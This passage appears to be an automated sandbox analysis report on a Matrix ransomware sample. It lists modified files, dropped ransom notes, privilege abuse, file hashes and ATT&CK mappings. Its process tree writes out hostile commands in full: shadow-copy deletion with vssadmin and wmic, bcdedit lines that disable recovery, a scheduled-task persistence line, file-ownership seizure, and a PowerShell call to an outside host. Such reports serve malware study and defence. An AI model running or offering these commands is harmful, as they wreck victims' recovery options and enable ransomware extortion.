2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-pl.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\msipc.dll.mui 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOCR.DLL 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_lt.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\PresentationBuildTasks.resources.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Wisp.thmx 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Conversion.v3.5.resources.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Trial-ul-oob.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ppd.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close-2.svg 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\PREVIEW.GIF 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\System\mfc140enu.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSQRY32.CHM 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\7-Zip\License.txt 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Grace-ul-oob.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-ul-oob.xrm-ms 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vcruntime140.dll 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\ui-strings.js 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#FOX_README#.rtf 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\CHICAGO.XSL 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4784 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exet7bUFRUw64.exepid process 1392 powershell.exe 1392 powershell.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe 3636 t7bUFRUw64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
t7bUFRUw64.exepid process 3636 t7bUFRUw64.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exetakeown.exet7bUFRUw64.exevssvc.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1392 powershell.exe Token: SeTakeOwnershipPrivilege 2132 takeown.exe Token: SeDebugPrivilege 3636 t7bUFRUw64.exe Token: SeLoadDriverPrivilege 3636 t7bUFRUw64.exe Token: SeBackupPrivilege 3612 vssvc.exe Token: SeRestorePrivilege 3612 vssvc.exe Token: SeAuditPrivilege 3612 vssvc.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe Token: 34 2120 WMIC.exe Token: 35 2120 WMIC.exe Token: 36 2120 WMIC.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe Token: 34 2120 WMIC.exe Token: 35 2120 WMIC.exe Token: 36 2120 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.execmd.execmd.execmd.execmd.execmd.exet7bUFRUw.exewscript.execmd.execmd.execmd.exedescription pid process target process PID 4824 wrote to memory of 4404 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4404 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4404 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 1732 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe NW1lWznw.exe PID 4824 wrote to memory of 1732 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe NW1lWznw.exe PID 4824 wrote to memory of 1732 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe NW1lWznw.exe PID 4824 wrote to memory of 4624 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4624 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4624 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4624 wrote to memory of 1392 4624 cmd.exe powershell.exe PID 4624 wrote to memory of 1392 4624 cmd.exe powershell.exe PID 4624 wrote to memory of 1392 4624 cmd.exe powershell.exe PID 4824 wrote to memory of 2464 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 2464 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 2464 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4692 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4692 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 4692 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 2464 wrote to memory of 1356 2464 cmd.exe reg.exe PID 2464 wrote to memory of 1356 2464 cmd.exe reg.exe PID 2464 wrote to memory of 1356 2464 cmd.exe reg.exe PID 4692 wrote to memory of 2436 4692 cmd.exe wscript.exe PID 4692 wrote to memory of 2436 4692 cmd.exe wscript.exe PID 4692 wrote to memory of 2436 4692 cmd.exe wscript.exe PID 2464 wrote to memory of 3232 2464 cmd.exe reg.exe PID 2464 wrote to memory of 3232 2464 cmd.exe reg.exe PID 2464 wrote to memory of 3232 2464 cmd.exe reg.exe PID 2464 wrote to memory of 1548 2464 cmd.exe reg.exe PID 2464 wrote to memory of 1548 2464 cmd.exe reg.exe PID 2464 wrote to memory of 1548 2464 cmd.exe reg.exe PID 4824 wrote to memory of 5028 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 5028 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 4824 wrote to memory of 5028 4824 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe cmd.exe PID 5028 wrote to memory of 5100 5028 cmd.exe attrib.exe PID 5028 wrote to memory of 5100 5028 cmd.exe attrib.exe PID 5028 wrote to memory of 5100 5028 cmd.exe attrib.exe PID 5028 wrote to memory of 1764 5028 cmd.exe cacls.exe PID 5028 wrote to memory of 1764 5028 cmd.exe cacls.exe PID 5028 wrote to memory of 1764 5028 cmd.exe cacls.exe PID 5028 wrote to memory of 2132 5028 cmd.exe takeown.exe PID 5028 wrote to memory of 2132 5028 cmd.exe takeown.exe PID 5028 wrote to memory of 2132 5028 cmd.exe takeown.exe PID 5028 wrote to memory of 4348 5028 cmd.exe cmd.exe PID 5028 wrote to memory of 4348 5028 cmd.exe cmd.exe PID 5028 wrote to memory of 4348 5028 cmd.exe cmd.exe PID 4348 wrote to memory of 1752 4348 cmd.exe t7bUFRUw.exe PID 4348 wrote to memory of 1752 4348 cmd.exe t7bUFRUw.exe PID 4348 wrote to memory of 1752 4348 cmd.exe t7bUFRUw.exe PID 1752 wrote to memory of 3636 1752 t7bUFRUw.exe t7bUFRUw64.exe PID 1752 wrote to memory of 3636 1752 t7bUFRUw.exe t7bUFRUw64.exe PID 2436 wrote to memory of 1324 2436 wscript.exe cmd.exe PID 2436 wrote to memory of 1324 2436 wscript.exe cmd.exe PID 2436 wrote to memory of 1324 2436 wscript.exe cmd.exe PID 1324 wrote to memory of 5004 1324 cmd.exe schtasks.exe PID 1324 wrote to memory of 5004 1324 cmd.exe schtasks.exe PID 1324 wrote to memory of 5004 1324 cmd.exe schtasks.exe PID 2436 wrote to memory of 4880 2436 wscript.exe cmd.exe PID 2436 wrote to memory of 4880 2436 wscript.exe cmd.exe PID 2436 wrote to memory of 4880 2436 wscript.exe cmd.exe PID 4880 wrote to memory of 5076 4880 cmd.exe schtasks.exe PID 4880 wrote to memory of 5076 4880 cmd.exe schtasks.exe PID 4880 wrote to memory of 5076 4880 cmd.exe schtasks.exe PID 5036 wrote to memory of 4784 5036 cmd.exe vssadmin.exe PID 5036 wrote to memory of 4784 5036 cmd.exe vssadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe" "C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe"2⤵PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe"C:\Users\Admin\AppData\Local\Temp\NW1lWznw.exe" -n2⤵
- Executes dropped EXE
PID:1732
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\3eYJeJpi.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Y14Gi9NT.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Y14Gi9NT.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1356
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3232
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YQNlwpHd.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YQNlwpHd.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5076
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GZh5nylM.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:5100
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c t7bUFRUw.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Users\Admin\AppData\Local\Temp\t7bUFRUw.exet7bUFRUw.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\t7bUFRUw64.exet7bUFRUw.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dGp89tLF.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4784
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4228
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5076
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3948
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bf2e20a79a066ec5e160ff0eeb92336a
SHA1814efa8b301955cb076a38f5ee1ab14574fec115
SHA2564cf925ebe4dd3d72d1e13692489258c9fdd80f57574a96126cb036d338a5e244
SHA512503194160be3eed9b1877bf09e383b3737499fcb63fa69c2f79255987bb889ab67709683a1d5245f7dda3b44ea48f907d5a827c953da14b6b31374ee1168e8ab
-
Filesize
3KB
MD5036a07e0d6cd8073a5bf95f6b3a9c8d3
SHA1ae9b958981050064b5f95925d66d50153852ffd0
SHA2561fa0657f909f21ddce746bc9f60376fd51bfeb11f43bc380193489eff78b8a65
SHA51200dd632f0513b2b7fb1deaa3cd67652b0379f777fbb4252755586d875bb1142ba0c612f2d1ae2f5d02eeb71694edff6971c8585acb78d76314f1bfd1b4e73a70
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
246B
MD580d252466386dbdb45af0df87b440ea6
SHA1cce89b93b8fbb57ef936a54ea50b93cf8c038b37
SHA256893814a6d5411a2183a44704214e940439ff66b05968a10265aa8f0319089921
SHA512a944cb4f9ee1b31d07da76c57f9ca089c313b80b9970c745e7388442dfce12c96c4ff39cd3497cbdb39eb2437f42f972828387cadb2052624f5b60d342df146b
-
Filesize
1.2MB
MD56411153c8a95e8c77127d99c75595604
SHA102e6b8baed744a6b0c78baddf1720654688e5642
SHA2562d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
SHA51265f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
Filesize
1.2MB
MD56411153c8a95e8c77127d99c75595604
SHA102e6b8baed744a6b0c78baddf1720654688e5642
SHA2562d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
SHA51265f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
